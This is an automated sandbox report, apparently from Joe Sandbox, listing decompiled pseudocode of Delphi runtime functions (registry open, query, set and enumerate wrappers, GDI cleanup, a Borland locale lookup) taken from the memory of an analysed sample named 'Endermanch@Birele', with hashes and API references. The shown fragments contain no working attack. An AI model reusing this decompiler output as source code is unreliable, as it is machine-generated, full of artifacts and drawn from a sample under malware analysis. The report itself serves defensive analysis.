                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 44%
                                                                                                          			E00406A8E(void* __eax) {
                                                                                                          				void* _t4;
                                                                                                          				int _t5;
                                                                                                          
                                                                                                          				_t4 = __eax;
                                                                                                          				if( *((char*)(__eax + 0x18)) != 1) {
                                                                                                          					asm("jecxz 0xa");
                                                                                                          					DeleteObject( *(__eax + 0x31));
                                                                                                          					_pop(_t4);
                                                                                                          					_push(_t4);
                                                                                                          				}
                                                                                                          				asm("jecxz 0x8");
                                                                                                          				_t5 = DeleteObject( *(_t4 + 0x19)); // executed
                                                                                                          				return E00406818(_t5);
                                                                                                          			}





                                                                                                          0x00406a8e
                                                                                                          0x00406a95
                                                                                                          0x00406a9a
                                                                                                          0x00406a9d
                                                                                                          0x00406aa2
                                                                                                          0x00406aa3
                                                                                                          0x00406aa3
                                                                                                          0x00406aa7
                                                                                                          0x00406aaa
                                                                                                          0x00406ab5

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 1531683806-0
                                                                                                          • Opcode ID: 11050a5f5332eabe293480d04a417c93c8e6a60e9b6efb213c1eb86e43156022
                                                                                                          • Instruction ID: f40f0d2549bdb67fbd6df8d461d043d7abc0c8bf2df47537e8dada0267b4ecf6
                                                                                                          • Opcode Fuzzy Hash: 11050a5f5332eabe293480d04a417c93c8e6a60e9b6efb213c1eb86e43156022
                                                                                                          • Instruction Fuzzy Hash: 9DD05EB13501002EDB48FB318425D27264CCB4531879288BF7403FB1E2CA7CECA0CE28
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 71%
                                                                                                          			E00415998(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				int _v12;
                                                                                                          				char _v16;
                                                                                                          				intOrPtr _v20;
                                                                                                          				intOrPtr _v36;
                                                                                                          				intOrPtr _v40;
                                                                                                          				char _v48;
                                                                                                          				char _v52;
                                                                                                          				void* _t41;
                                                                                                          				long _t56;
                                                                                                          				void* _t66;
                                                                                                          				void* _t67;
                                                                                                          				intOrPtr _t80;
                                                                                                          				int _t87;
                                                                                                          				void* _t89;
                                                                                                          				void* _t91;
                                                                                                          				void* _t92;
                                                                                                          				intOrPtr _t93;
                                                                                                          
                                                                                                          				_t91 = _t92;
                                                                                                          				_t93 = _t92 + 0xffffffd0;
                                                                                                          				_push(__ebx);
                                                                                                          				_v52 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				_v8 = __edx;
                                                                                                          				_t89 = __eax;
                                                                                                          				_push(_t91);
                                                                                                          				_push(0x415aaf);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t93;
                                                                                                          				_v20 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                          				E004151F0( *((intOrPtr*)(_a4 - 4)), __eax);
                                                                                                          				_push(_t91);
                                                                                                          				_push(0x415a8a);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t93;
                                                                                                          				_t41 = E0041558C( *((intOrPtr*)(_a4 - 4)),  &_v48, __eflags);
                                                                                                          				_t95 = _t41;
                                                                                                          				if(_t41 != 0) {
                                                                                                          					E00415878(_t89, __ebx, 0, _v8, _t89, _t95, _a4); // executed
                                                                                                          					E00403A9C( &_v16, _v36 + 1, 0);
                                                                                                          					_t66 = _v40 - 1;
                                                                                                          					if(_t66 >= 0) {
                                                                                                          						_t67 = _t66 + 1;
                                                                                                          						_t87 = 0;
                                                                                                          						do {
                                                                                                          							_v12 = _v36 + 1;
                                                                                                          							_t56 = RegEnumValueA(_t89, _t87, E00403E38(_v16),  &_v12, 0, 0, 0, 0); // executed
                                                                                                          							_t98 = _t56;
                                                                                                          							if(_t56 == 0) {
                                                                                                          								E00403BA4( &_v52, E00403E38(_v16));
                                                                                                          								E00415878(_t89, _t67, _v52, _v8, _t89, _t98, _a4); // executed
                                                                                                          							}
                                                                                                          							_t87 = _t87 + 1;
                                                                                                          							_t67 = _t67 - 1;
                                                                                                          						} while (_t67 != 0);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_pop(_t80);
                                                                                                          				 *[fs:eax] = _t80;
                                                                                                          				_push(E00415A91);
                                                                                                          				return E004151F0( *((intOrPtr*)(_a4 - 4)), _v20);
                                                                                                          			}





















                                                                                                          0x00415999
                                                                                                          0x0041599b
                                                                                                          0x0041599e
                                                                                                          0x004159a3
                                                                                                          0x004159a6
                                                                                                          0x004159a9
                                                                                                          0x004159ac
                                                                                                          0x004159b0
                                                                                                          0x004159b1
                                                                                                          0x004159b6
                                                                                                          0x004159b9
                                                                                                          0x004159c5
                                                                                                          0x004159d0
                                                                                                          0x004159d7
                                                                                                          0x004159d8
                                                                                                          0x004159dd
                                                                                                          0x004159e0
                                                                                                          0x004159ec
                                                                                                          0x004159f1
                                                                                                          0x004159f3
                                                                                                          0x00415a00
                                                                                                          0x00415a0f
                                                                                                          0x00415a17
                                                                                                          0x00415a1a
                                                                                                          0x00415a1c
                                                                                                          0x00415a1d
                                                                                                          0x00415a1f
                                                                                                          0x00415a23
                                                                                                          0x00415a3d
                                                                                                          0x00415a42
                                                                                                          0x00415a44
                                                                                                          0x00415a57
                                                                                                          0x00415a64
                                                                                                          0x00415a69
                                                                                                          0x00415a6a
                                                                                                          0x00415a6b
                                                                                                          0x00415a6b
                                                                                                          0x00415a1f
                                                                                                          0x00415a1a
                                                                                                          0x00415a70
                                                                                                          0x00415a73
                                                                                                          0x00415a76
                                                                                                          0x00415a89

                                                                                                          APIs
                                                                                                            • Part of subcall function 0041558C: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,0041548A,00000000), ref: 004155C3
                                                                                                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumInfoQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 918324718-0
                                                                                                          • Opcode ID: 63e267d475dcd352d8fbff878842719c3677ac2519d315a21a806ea70cde275c
                                                                                                          • Instruction ID: 171b7b22683ce0dd6a9f90d9f0d3745b5014ced1ac0cdb1bd2b591f6e2352622
                                                                                                          • Opcode Fuzzy Hash: 63e267d475dcd352d8fbff878842719c3677ac2519d315a21a806ea70cde275c
                                                                                                          • Instruction Fuzzy Hash: 13314C35A40A08EFCB15DF59D881ADEBBF9EF88744F10816AF805E7350D738AE418A58
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 63%
                                                                                                          			E00415774(void* __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                          				void* _v8;
                                                                                                          				char _v12;
                                                                                                          				char* _t20;
                                                                                                          				intOrPtr _t39;
                                                                                                          				void* _t42;
                                                                                                          				void* _t45;
                                                                                                          
                                                                                                          				_v12 = 0;
                                                                                                          				_t42 = __eax;
                                                                                                          				_push(_t45);
                                                                                                          				_push(0x4157fa);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t45 + 0xfffffff8;
                                                                                                          				E00403A44( &_v12, __edx);
                                                                                                          				_t31 = E00415080(_v12);
                                                                                                          				if(_t15 == 0) {
                                                                                                          					E00403ED8( &_v12, 1, 1);
                                                                                                          				}
                                                                                                          				_v8 = 0;
                                                                                                          				_t20 = E00403E38(_v12);
                                                                                                          				RegOpenKeyExA(E004151DC(_t42, _t31), _t20, 0,  *(_t42 + 0x18),  &_v8); // executed
                                                                                                          				_pop(_t39);
                                                                                                          				 *[fs:eax] = _t39;
                                                                                                          				_push(E00415801);
                                                                                                          				return E004039AC( &_v12);
                                                                                                          			}









                                                                                                          0x0041577e
                                                                                                          0x00415783
                                                                                                          0x00415787
                                                                                                          0x00415788
                                                                                                          0x0041578d
                                                                                                          0x00415790
                                                                                                          0x00415798
                                                                                                          0x004157a5
                                                                                                          0x004157a9
                                                                                                          0x004157b8
                                                                                                          0x004157b8
                                                                                                          0x004157bf
                                                                                                          0x004157cf
                                                                                                          0x004157df
                                                                                                          0x004157e6
                                                                                                          0x004157e9
                                                                                                          0x004157ec
                                                                                                          0x004157f9

                                                                                                          APIs
                                                                                                          • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: da6321ca1a5460769cac36411174f0f422d1a086cda09e0fa116f1de2c7eb90d
                                                                                                          • Instruction ID: 47511d12f3aef131803622a604d24f8fcd8368f09904956ba7ec79515bc67909
                                                                                                          • Opcode Fuzzy Hash: da6321ca1a5460769cac36411174f0f422d1a086cda09e0fa116f1de2c7eb90d
                                                                                                          • Instruction Fuzzy Hash: E2017971B00604AFD701EEA5CC51BDF7BECDB48314F50057AF445E3681DA799E448698
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415700(void* __eax, char* __ecx, char __edx, char* _a4, int _a8) {
                                                                                                          				int _v8;
                                                                                                          				char _v12;
                                                                                                          				char _v16;
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				long _t18;
                                                                                                          				void* _t25;
                                                                                                          				intOrPtr _t28;
                                                                                                          				char _t33;
                                                                                                          
                                                                                                          				_t32 = __ecx;
                                                                                                          				_t33 = __edx;
                                                                                                          				_t25 = __eax;
                                                                                                          				_v8 = 0;
                                                                                                          				_t18 = RegQueryValueExA( *(_t25 + 4), E00403E38(__edx), 0,  &_v8, __ecx,  &_a8); // executed
                                                                                                          				if(_t18 != 0) {
                                                                                                          					_v16 = _t33;
                                                                                                          					_v12 = 0xb;
                                                                                                          					_t28 =  *0x4186ec; // 0x4119cc
                                                                                                          					E0040CDD0(_t25, _t28, 1, _t32, _t33, 0,  &_v16);
                                                                                                          					E0040340C();
                                                                                                          				}
                                                                                                          				 *_a4 = E004150C4(_v8);
                                                                                                          				return _a8;
                                                                                                          			}














                                                                                                          0x00415709
                                                                                                          0x0041570b
                                                                                                          0x0041570d
                                                                                                          0x00415711
                                                                                                          0x0041572b
                                                                                                          0x00415732
                                                                                                          0x00415734
                                                                                                          0x00415737
                                                                                                          0x00415741
                                                                                                          0x0041574e
                                                                                                          0x00415753
                                                                                                          0x00415753
                                                                                                          0x00415766
                                                                                                          0x00415770

                                                                                                          APIs
                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0041572B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 292d9cf08de223ccc11b9e93949077ff9a3d770c15aca02e3c3024be2242dc6c
                                                                                                          • Instruction ID: 8bd14ddaeae1c8616342ad069fe68d0a979596aaffdc41c8fb174ff3456db14c
                                                                                                          • Opcode Fuzzy Hash: 292d9cf08de223ccc11b9e93949077ff9a3d770c15aca02e3c3024be2242dc6c
                                                                                                          • Instruction Fuzzy Hash: 1F014476600208EBD700DF99DC81ADFBBACDB59314F10817BF918DB381D6359E0487A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415696(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                                                                          				char* _v8;
                                                                                                          				char _v12;
                                                                                                          				char _v16;
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				int _t11;
                                                                                                          				long _t17;
                                                                                                          				void* _t21;
                                                                                                          				intOrPtr _t24;
                                                                                                          				char _t28;
                                                                                                          
                                                                                                          				_v8 = __ecx;
                                                                                                          				_t28 = __edx;
                                                                                                          				_t21 = __eax;
                                                                                                          				_t11 = E00415094(_a4);
                                                                                                          				_t31 = _t11;
                                                                                                          				_t17 = RegSetValueExA( *(_t21 + 4), E00403E38(__edx), 0, _t11, _v8, _a8); // executed
                                                                                                          				if(_t17 != 0) {
                                                                                                          					_v16 = _t28;
                                                                                                          					_v12 = 0xb;
                                                                                                          					_t24 =  *0x4185ec; // 0x4119d4
                                                                                                          					_t17 = E0040CDD0(_t21, _t24, 1, _t28, _t31, 0,  &_v16);
                                                                                                          					E0040340C();
                                                                                                          				}
                                                                                                          				return _t17;
                                                                                                          			}















                                                                                                          0x004156a1
                                                                                                          0x004156a4
                                                                                                          0x004156a6
                                                                                                          0x004156ab
                                                                                                          0x004156b0
                                                                                                          0x004156c9
                                                                                                          0x004156d0
                                                                                                          0x004156d2
                                                                                                          0x004156d5
                                                                                                          0x004156df
                                                                                                          0x004156ec
                                                                                                          0x004156f1
                                                                                                          0x004156f1
                                                                                                          0x004156fc

                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 004156C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value
                                                                                                          • String ID:
                                                                                                          • API String ID: 3702945584-0
                                                                                                          • Opcode ID: 110583e59d283a51ccfc2e95f9fe73454536ad94bd67b7403a70ed534a2fa6e5
                                                                                                          • Instruction ID: e0a30de7032ceb8ed40cdb7cb97f5139a17b202b7d43ec026f63b4ff7e1ed465
                                                                                                          • Opcode Fuzzy Hash: 110583e59d283a51ccfc2e95f9fe73454536ad94bd67b7403a70ed534a2fa6e5
                                                                                                          • Instruction Fuzzy Hash: 9AF03175A00104BBD700DBAEDC85AEBBBEC9B99314F048176F918DB391E6359D0187A5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00415698(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                                                                          				char* _v8;
                                                                                                          				char _v12;
                                                                                                          				char _v16;
                                                                                                          				void* __ebx;
                                                                                                          				void* __edi;
                                                                                                          				void* __esi;
                                                                                                          				void* __ebp;
                                                                                                          				int _t11;
                                                                                                          				long _t17;
                                                                                                          				void* _t20;
                                                                                                          				void* _t21;
                                                                                                          				intOrPtr _t23;
                                                                                                          				char _t26;
                                                                                                          
                                                                                                          				_v8 = __ecx;
                                                                                                          				_t26 = __edx;
                                                                                                          				_t21 = __eax;
                                                                                                          				_t11 = E00415094(_a4);
                                                                                                          				_t27 = _t11;
                                                                                                          				_t17 = RegSetValueExA( *(_t21 + 4), E00403E38(__edx), 0, _t11, _v8, _a8); // executed
                                                                                                          				if(_t17 != 0) {
                                                                                                          					_v16 = _t26;
                                                                                                          					_v12 = 0xb;
                                                                                                          					_t23 =  *0x4185ec; // 0x4119d4
                                                                                                          					_t20 = E0040CDD0(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
                                                                                                          					E0040340C();
                                                                                                          					return _t20;
                                                                                                          				}
                                                                                                          				return _t17;
                                                                                                          			}
















                                                                                                          0x004156a1
                                                                                                          0x004156a4
                                                                                                          0x004156a6
                                                                                                          0x004156ab
                                                                                                          0x004156b0
                                                                                                          0x004156c9
                                                                                                          0x004156d0
                                                                                                          0x004156d2
                                                                                                          0x004156d5
                                                                                                          0x004156df
                                                                                                          0x004156ec
                                                                                                          0x004156f1
                                                                                                          0x00000000
                                                                                                          0x004156f1
                                                                                                          0x004156fc

                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 004156C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value
                                                                                                          • String ID:
                                                                                                          • API String ID: 3702945584-0
                                                                                                          • Opcode ID: 8ef6ea071e85192f38c534134de71ad3c6a50295a9ec61429d20e961844e585f
                                                                                                          • Instruction ID: c3358207af9546fb9bb7422cc02208a2908ff03dd5fec4b9db77a928d0d4c66d
                                                                                                          • Opcode Fuzzy Hash: 8ef6ea071e85192f38c534134de71ad3c6a50295a9ec61429d20e961844e585f
                                                                                                          • Instruction Fuzzy Hash: D8F04475A00104BBC700DBAEDC85ADBBBEC9F99314F048176F918DB391D6359D0187A5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 60%
                                                                                                          			E0041580A(intOrPtr __eax, void* __ebx) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				char _v9;
                                                                                                          				intOrPtr _v16;
                                                                                                          				void* _t18;
                                                                                                          				intOrPtr _t20;
                                                                                                          				void* _t23;
                                                                                                          				void* _t26;
                                                                                                          				intOrPtr _t27;
                                                                                                          				void* _t29;
                                                                                                          				void* _t32;
                                                                                                          
                                                                                                          				_push(__ebx);
                                                                                                          				_v8 = __eax;
                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                                          				_push(_t32);
                                                                                                          				_push(0x415868);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t32 + 0xfffffff4;
                                                                                                          				 *((intOrPtr*)(_v8 + 0x18)) = 0x20009;
                                                                                                          				_t18 = E00415774(_v8, __ebx, _t26, _t29); // executed
                                                                                                          				_t23 = _t18;
                                                                                                          				if(_t23 != 0) {
                                                                                                          					RegCloseKey(_t23);
                                                                                                          				}
                                                                                                          				_v9 = _t23 != 0;
                                                                                                          				_pop(_t27);
                                                                                                          				 *[fs:eax] = _t27;
                                                                                                          				_push(E0041586F);
                                                                                                          				_t20 = _v8;
                                                                                                          				 *((intOrPtr*)(_t20 + 0x18)) = _v16;
                                                                                                          				return _t20;
                                                                                                          			}













                                                                                                          0x00415812
                                                                                                          0x00415813
                                                                                                          0x0041581c
                                                                                                          0x00415821
                                                                                                          0x00415822
                                                                                                          0x00415827
                                                                                                          0x0041582a
                                                                                                          0x00415830
                                                                                                          0x0041583a
                                                                                                          0x0041583f
                                                                                                          0x00415843
                                                                                                          0x00415846
                                                                                                          0x00415846
                                                                                                          0x0041584d
                                                                                                          0x00415853
                                                                                                          0x00415856
                                                                                                          0x00415859
                                                                                                          0x0041585e
                                                                                                          0x00415864
                                                                                                          0x00415867

                                                                                                          APIs
                                                                                                            • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 47109696-0
                                                                                                          • Opcode ID: e15d3b8a0ab92ca7ff597e0c8709e4cdd6bde802c9ca42345794be7b768e57dd
                                                                                                          • Instruction ID: a7ada43f45fcd5a96a44a414db197a4a9e9a7bc9a05c56c6c9b0084cc350734a
                                                                                                          • Opcode Fuzzy Hash: e15d3b8a0ab92ca7ff597e0c8709e4cdd6bde802c9ca42345794be7b768e57dd
                                                                                                          • Instruction Fuzzy Hash: C8F06274A04704EFDB01DFA9C89199DB7F8EB88710B6244B6EC10A7351D774EE50DA54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 60%
                                                                                                          			E0041580C(intOrPtr __eax, void* __ebx, void* __edx, void* __eflags) {
                                                                                                          				intOrPtr _v8;
                                                                                                          				char _v9;
                                                                                                          				intOrPtr _v16;
                                                                                                          				void* _t18;
                                                                                                          				intOrPtr _t20;
                                                                                                          				void* _t23;
                                                                                                          				intOrPtr _t27;
                                                                                                          				void* _t29;
                                                                                                          				void* _t32;
                                                                                                          
                                                                                                          				_push(__ebx);
                                                                                                          				_v8 = __eax;
                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x18));
                                                                                                          				_push(_t32);
                                                                                                          				_push(0x415868);
                                                                                                          				_push( *[fs:eax]);
                                                                                                          				 *[fs:eax] = _t32 + 0xfffffff4;
                                                                                                          				 *((intOrPtr*)(_v8 + 0x18)) = 0x20009;
                                                                                                          				_t18 = E00415774(_v8, __ebx, __edx, _t29); // executed
                                                                                                          				_t23 = _t18;
                                                                                                          				if(_t23 != 0) {
                                                                                                          					RegCloseKey(_t23);
                                                                                                          				}
                                                                                                          				_v9 = _t23 != 0;
                                                                                                          				_pop(_t27);
                                                                                                          				 *[fs:eax] = _t27;
                                                                                                          				_push(E0041586F);
                                                                                                          				_t20 = _v8;
                                                                                                          				 *((intOrPtr*)(_t20 + 0x18)) = _v16;
                                                                                                          				return _t20;
                                                                                                          			}












                                                                                                          0x00415812
                                                                                                          0x00415813
                                                                                                          0x0041581c
                                                                                                          0x00415821
                                                                                                          0x00415822
                                                                                                          0x00415827
                                                                                                          0x0041582a
                                                                                                          0x00415830
                                                                                                          0x0041583a
                                                                                                          0x0041583f
                                                                                                          0x00415843
                                                                                                          0x00415846
                                                                                                          0x00415846
                                                                                                          0x0041584d
                                                                                                          0x00415853
                                                                                                          0x00415856
                                                                                                          0x00415859
                                                                                                          0x0041585e
                                                                                                          0x00415864
                                                                                                          0x00415867

                                                                                                          APIs
                                                                                                            • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00415868), ref: 00415846
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.523870340.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_Endermanch@Birele.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 47109696-0
                                                                                                          • Opcode ID: cc830feb8e5308027b29ff64ac4e77b8c189eaf0d8055625493bdfaaedde9ba6
                                                                                                          • Instruction ID: 1cc0e00312df05a8b6d43753908d74299a530909d5072024098ec33241c67906
                                                                                                          • Opcode Fuzzy Hash: cc830feb8e5308027b29ff64ac4e77b8c189eaf0d8055625493bdfaaedde9ba6
                                                                                                          • Instruction Fuzzy Hash: 71F06D74A04704EFDB01DFAAC89199EB7F8EB88710B6248B6E810A7361D774EE50DA54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 100%
                                                                                                          			E00404874(void* __eax) {
                                                                                                          				char _v272;
                                                                                                          				intOrPtr _t14;
                                                                                                          				void* _t16;
                                                                                                          				intOrPtr _t18;
                                                                                                          				intOrPtr _t19;
                                                                                                          
                                                                                                          				_t16 = __eax;
                                                                                                          				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                          					_t3 = _t16 + 4; // 0x400000
                                                                                                          					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                                                          					_t14 = E00404AB0(_t19); // executed
                                                                                                          					_t18 = _t14;
                                                                                                          					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                          					if(_t18 == 0) {
                                                                                                          						_t5 = _t16 + 4; // 0x400000
                                                                                                          						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				_t7 = _t16 + 0x10; // 0x400000
                                                                                                          				return  *_t7;
                                                                                                          			}








                                                                                                          0x0040487c
                                                                                                          0x00404882
                                                                                                          0x0040488e
                                                                                                          0x00404892
                                                                                                          0x0040489b
                                                                                                          0x004048a0
                                                                                                          0x004048a2
                                                                                                          0x004048a7
                                                                                                          0x004048a9
                                                                                                          0x004048ac
                                                                                                          0x004048ac
                                                                                                          0x004048a7
                                                                                                          0x004048af
                                                                                                          0x004048ba

                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404892
                                                                                                            • Part of subcall function 00404AB0: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 00404ACC
                                                                                                            • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404AEA
                                                                                                            • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404B08
                                                                                                            • Part of subcall function 00404AB0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00404B26
                                                                                                            • Part of subcall function 00404AB0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404B6F
                                                                                                            • Part of subcall function 00404AB0: RegQueryValueExA.ADVAPI32(?,00404D1C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00404BB5,?,80000001), ref: 00404B8D
                                                                                                            • Part of subcall function 00404AB0: RegCloseKey.ADVAPI32(?,00404BBC,00000000,00000000,00000005,00000000,00404BB5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404BAF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.522641276.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.523818689.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
